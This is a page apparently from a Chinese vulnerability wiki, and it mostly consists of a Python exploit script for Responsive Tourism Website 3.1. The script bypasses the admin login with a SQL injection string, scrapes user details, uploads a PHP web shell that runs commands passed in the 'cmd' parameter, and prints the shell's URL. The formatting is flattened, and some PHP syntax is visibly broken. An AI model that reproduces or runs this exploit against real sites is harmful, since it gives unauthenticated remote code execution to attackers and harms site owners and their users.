免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
影响版本
Version: V 3.1
EXP
# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) # Date: 22.06.2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html # Version: V 3.1 # Tested on: MacOS & Windows import requests import random import string from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" session = requests.Session() session.get(url + 'admin/login.php') print("- Bypassing login -") login_url = url + "classes/Login.php?f=login" login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"} session.post(login_url, cookies=session.cookies.get_dict(), data=login_data) print("- Protecting User -") protectSettings_url = url + 'admin/?page=user' protectSetting_html = session.get(protectSettings_url) protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser') ids = protectSettings_parser.find('input', {'name':'id'}).get("value") firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value") lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value") username = protectSettings_parser.find('input', {'id':'username'}).get("value") print("User ID : " + ids) print("First Name : " + firstname) print("Last Name : " + lastname) print("Username : " + username) print("- OK -") let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) print("Shell uploading") upload_url = url + "classes/Users.php?f=save" upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} upload_payload = "<?php if(isset($_GET'cmd')){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET'cmd'); system($cmd); echo '
'; die; } ?>"
upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n"
upload = session.post(upload_url, headers=upload_headers, data=upload_data)
if upload.status_code == 200:
print("- OK -") req = session.get(url + "/admin/?page=user", headers=session.headers) parser = BeautifulSoup(req.text, 'html.parser') find_shell = parser.find('img', {'id':'cimg'}) print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
else:
print("- NO :( -")
免费、自由、人人可编辑的漏洞库